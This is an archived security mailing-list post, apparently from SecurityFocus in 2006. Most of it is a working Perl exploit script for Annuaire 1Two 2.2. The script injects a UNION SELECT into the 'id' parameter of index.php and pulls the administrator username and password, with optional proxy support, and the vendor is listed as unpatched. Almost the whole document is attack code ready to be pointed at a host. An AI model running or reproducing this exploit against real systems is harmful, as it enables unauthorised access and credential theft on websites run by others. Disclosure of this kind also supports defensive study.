Annuaire 1Two 2.2 Remote SQL Injection Exploit Sep 02 2006 01:39PM
gmdarkfig gmail com
#!/usr/bin/perl

#

# Affected.scr..: Annuaire 1Two 2.2

# Poc.ID........: 09060902.txt

# Type..........: SQL Injection (without quote)

# Risk.level....: Medium

# Vendor.Status.: Unpatched

# Src.download..: http://www.1two.org/

# Poc.link......: acid-root.new.fr/poc/09060902.txt

# Credits.......: DarkFig

#

#

use LWP::UserAgent;

use HTTP::Request;

use Getopt::Long;

use strict;

print STDOUT "\n+", '-' x 53, "+\n";

print STDOUT "| Annuaire 1Two 2.2 Remote SQL Injection Exploit |\n";

print STDOUT '+', '-' x 53, "+\n";

my($host,$path,$proxh,$proxu,$proxp,);

my $opt = GetOptions(

'host=s' => \$host,

'path=s' => \$path,

'proxh=s' => \$proxh,

'proxu=s' => \$proxu,

'proxp=s' => \$proxp);

if(!$host) {

print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |\n";

print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";

print STDOUT '+', '-' x 53, "+\n";

exit(0);

}

if(!$path) {$path = '/';}

if($host !~ /http/) {$host = 'http://'.$host;}

if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}

my @fi = ('username', 'password');

my $ur = $host.$path.'index.php?id=';

my $ua = LWP::UserAgent->new();

$ua->agent('Mozilla XD');

$ua->timeout(30);

$ua->proxy(['http'] => $proxh) if $proxh;

foreach(@fi) {

my $xx = $_;

my $re = HTTP::Request->new(GET => $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin");

$re->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $xd = $ua->request($re);

my $da = $xd->content;

if($da =~ /- (.*?)<\/title>/) {

if($xx eq 'username') {

print STDOUT " [+]User:";}

if($xx eq 'password') {

print STDOUT " [+]Passwd:";}

print STDOUT " $1\n";

} else {

print STDOUT "[!]Exploit failed\n";

}}

print STDOUT "+", '-' x 53, "+\n";

exit(0);

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus